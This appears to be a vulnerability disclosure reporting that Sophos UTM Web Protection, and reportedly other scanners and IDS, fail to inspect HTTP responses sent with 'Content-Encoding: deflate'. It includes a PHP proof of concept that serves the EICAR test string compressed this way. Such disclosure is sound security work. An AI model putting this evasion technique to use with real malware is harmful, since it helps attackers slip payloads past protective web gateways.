Please note that republishing this article in full or in part is only allowed under the conditions described here.
From the product description of Sophos UTM Web Protection:
Our Secure Web Gateway prevents malware infections and gives you control
over your employees’ web use. Spyware and viruses are stopped before they
can enter the network. And, you can quickly create policies that set where and
how employees spend time online.
Highlights: ...Prevent infection with dual, independent antivirus engines
<?php header('HTTP/1.0 200 ok'); header('Content-type: text/plain'); header('Content-Encoding: deflate'); // EICAR compressed with RFC 1951 (raw deflate) echo base64_decode('izD1VwxQdXAMiDaJCYiKMDXRCIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAA=='); exit(0); ?>
33691: HTTP responses which contain malware and are delivered with “Content-Encoding: deflate” are not caught by virus scanners
Please note that ZScaler and Comodo Web Inspector URL scanners can also be easily bypassed the same way. Virustotal and Intrustion Dection Systems (IDS) like Bro, Snort, Suricata and probably other IDS and firewalls can be bypassed in similar ways.